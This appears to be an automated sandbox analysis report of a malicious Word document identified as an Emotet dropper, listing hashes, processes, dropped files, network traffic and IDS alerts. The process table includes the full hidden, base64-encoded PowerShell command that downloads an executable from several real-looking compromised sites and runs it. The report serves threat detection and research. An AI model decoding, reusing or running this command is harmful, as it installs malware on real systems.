File name: | inf Jan 17 20.doc |
Full analysis: | https://app.any.run/tasks/625eb4ea-67de-4787-826c-ebca5d1a9893 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2020, 18:13:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Repudiandae., Author: Jules Lefebvre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 16:30:00 2020, Last Saved Time/Date: Fri Jan 17 16:30:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0 |
MD5: | 656690FC7098AB6403AC9D920BBBAD9D |
SHA1: | 34AF857F75D80E4A14E511C1BC2CA94B169675EC |
SHA256: | 8DCFD7EF7CACDBB65DB980478C47CBA2D0474A4486B0DC71B16B424BC0741922 |
SSDEEP: | 6144:K00Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+2wywrP:K00E3dxtR/iU9mvUPQwrP |
.doc | | | Microsoft Word document (80) |
---|
Title: | Repudiandae. |
---|---|
Subject: | - |
Author: | Jules Lefebvre |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:01:17 16:30:00 |
ModifyDate: | 2020:01:17 16:30:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 18 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 20 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2528 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\inf Jan 17 20.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2300 | Powershell -w hidden -en JABIAHYAdQB6AG4AYQBiAHQAYQBtAGsAPQAnAEYAcQBzAGIAbgBvAGEAYQAnADsAJABVAGEAdgBtAHAAaAB6AHMAdQAgAD0AIAAnADkANwA1ACcAOwAkAFAAcAB3AHUAcABmAHEAbwBzAD0AJwBPAG8AbQBhAGoAdABuAGUAJwA7ACQARgBqAGoAZQB2AGoAagBqAGwAbwBqAHUAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBhAHYAbQBwAGgAegBzAHUAKwAnAC4AZQB4AGUAJwA7ACQATQB1AGcAeQBvAHkAZgBnAGwAcAA9ACcATwBqAHgAZQBnAGUAdgB2AHcAdwB3AGQAYwAnADsAJABRAGsAbQB1AHMAaAB5AG0APQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAYwBsAEkARQBuAFQAOwAkAFAAegBpAG0AcQBmAHYAdABzAHcAcABhAD0AJwBoAHQAdABwADoALwAvAGYAbABpAHgAegAuAHgAeQB6AC8AdwBwAC0AYQBkAG0AaQBuAC8ASQBoAHAAeQB3AFgASgBhAFoALwAqAGgAdAB0AHAAOgAvAC8AYQBtAGEAYQByAGgAbwBtAGUAcwAuAGMAYQAvAHMAYwBzAHMALwBlAEcASABnAG8AaQBxAGkALwAqAGgAdAB0AHAAOgAvAC8AYgBvAG8AawBpAG4AZwAuAGEAcgBhAGkALgBhAGcAZQBuAGMAeQAvAGMAbwByAGUALwBtAHoAVgBmAFIAVwBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdgBsAGUAZQAuAGsAcgAvAHcAcAAtAGEAZABtAGkAbgAvAEIAZgB4AFoAWQBCAFEAdQByAC8AKgBoAHQAdABwAHMAOgAvAC8AdABvAHIAbgBlAG8AcABvAGwAbABvAHMALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBiAHkAVQB4AEgAbQBqAGkALwAnAC4AIgBzAFAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQATgBlAGgAbgB1AGQAdgBkAHYAcAB3AD0AJwBMAGgAZwBwAHQAcAB6AGMAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB4AHYAaQBlAGMAYQBxAGwAaQAgAGkAbgAgACQAUAB6AGkAbQBxAGYAdgB0AHMAdwBwAGEAKQB7AHQAcgB5AHsAJABRAGsAbQB1AHMAaAB5AG0ALgAiAEQAYABPAFcAbgBgAGwATwBhAGAAZABGAEkAbABFACIAKAAkAEIAeAB2AGkAZQBjAGEAcQBsAGkALAAgACQARgBqAGoAZQB2AGoAagBqAGwAbwBqAHUAaAApADsAJABKAGoAeABuAHEAeQBjAHcAawBqAD0AJwBFAGMAbgB1AHQAZwBjAG8AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABGAGoAagBlAHYAagBqAGoAbABvAGoAdQBoACkALgAiAEwAYABFAG4AZwB0AGgAIgAgAC0AZwBlACAAMgA4ADIAMQA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABBAGAAUgB0ACIAKAAkAEYAagBqAGUAdgBqAGoAagBsAG8AagB1AGgAKQA7ACQASwBvAHEAZwBqAG0AZQBtAGwAegB1AD0AJwBHAGgAbQB3AG4AYQBwAHgAdABmACcAOwBiAHIAZQBhAGsAOwAkAEcAdgBnAHcAegByAGIAZgB1AG0AegA9ACcAUwBqAGcAdwBnAGMAawB5AGMAbgBsAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwBvAHIAcgBpAG8AcwBkAD0AJwBRAGwAaQB0AHkAcQB0AGkAbQBlAHUAcQBpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
584 | "C:\Users\admin\975.exe" | C:\Users\admin\975.exe | — | Powershell.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
1448 | --1fc0d5f5 | C:\Users\admin\975.exe | 975.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2304 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 975.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
1188 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA9F6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA78BC15EDF0CD0CB.TMP | — | |
MD5:— | SHA256:— | |||
2300 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\61WO4LW86RJJIOXH6P3O.temp | — | |
MD5:— | SHA256:— | |||
2528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:AC20989C58B710C022AF4613E7F09FAE | SHA256:EE88A980AB12DD0D4DD6A91650296F618880EFD04FA13A0D4F75E72F2A85760D | |||
2300 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6F8C1820F0B071F067DE525E4013643A | SHA256:71444B33EED9191FFBFB7BAC166262600AC32E67D681D666E910D5AAB974E2AD | |||
2528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\inf Jan 17 20.doc.LNK | lnk | |
MD5:79E3D3A84DF5DDA68600D68ABE692ABE | SHA256:0AB65F709C651DB6CCA01B20F220685DFFCD7B8211E3636FA982C37D7A9DC2C3 | |||
2300 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39c1d3.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2528 | WINWORD.EXE | C:\Users\admin\Desktop\~$f Jan 17 20.doc | pgc | |
MD5:97F186F26518F6AB24D6130EAF6D5804 | SHA256:9B4868AF97B6F2EE765740B22DA27AD1584AF720D6DF4A52A76CA3F320FEDD0C | |||
1448 | 975.exe | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | executable | |
MD5:3A37758B03500735F82DE9BE3D393A5B | SHA256:E9E859849A0464CB9793EA05C96F358A364861F29F2DA7AE3E2007ED908E7FAB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2300 | Powershell.exe | GET | 200 | 149.255.60.174:80 | http://flixz.xyz/wp-admin/IhpywXJaZ/ | GB | executable | 332 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2300 | Powershell.exe | 149.255.60.174:80 | flixz.xyz | Awareness Software Limited | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
flixz.xyz |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2300 | Powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
2300 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2300 | Powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2300 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2300 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |